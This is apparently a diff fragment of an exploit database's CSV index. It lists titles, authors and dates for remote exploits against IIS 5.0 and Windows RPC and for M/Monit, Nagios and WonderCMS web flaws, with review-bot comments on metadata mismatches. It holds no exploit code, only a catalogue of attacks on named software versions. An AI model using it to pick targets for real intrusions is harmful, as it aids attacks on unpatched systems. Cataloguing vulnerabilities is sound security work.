2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
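Review bot: The author for 49088 is recorded as `stresser`, but the file header added in the same commit says `# Exploit Author: Achilles`; one of the two should be corrected before the index is published. The 49084 row is classified `local` with an empty port column while its title says 'Remote Code Execution (SEH)'; the classification matches the steps in the file (the victim pastes crafted text into a local dialog), so it is the title that should change.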
@ -43311,3 +43315,4 @@ id,file,description,date,author,type,platform,port
49080,exploits/multiple/webapps/49080.py,"M/Monit 3.7.4 - Privilege Escalation",2020-11-19,"Dolev Farhi",webapps,multiple,
|
||||
49081,exploits/multiple/webapps/49081.py,"M/Monit 3.7.4 - Password Disclosure",2020-11-19,"Dolev Farhi",webapps,multiple,
|
||||
49082,exploits/multiple/webapps/49082.txt,"Nagios Log Server 2.1.7 - Persistent Cross-Site Scripting",2020-11-19,"Emre ÖVÜNÇ",webapps,multiple,
|
||||
49085,exploits/php/webapps/49085.txt,"WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting",2020-11-20,"Hemant Patidar",webapps,php,
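Review bot: The title for 49085 names 'content' as the vulnerable parameter, while the file it indexes says 'Vulnerable Parameters: Page description'; the captured POST body shows `fieldname=description&...&content=...`, so the title is correct and the file text should refer to the `content` field of the page description.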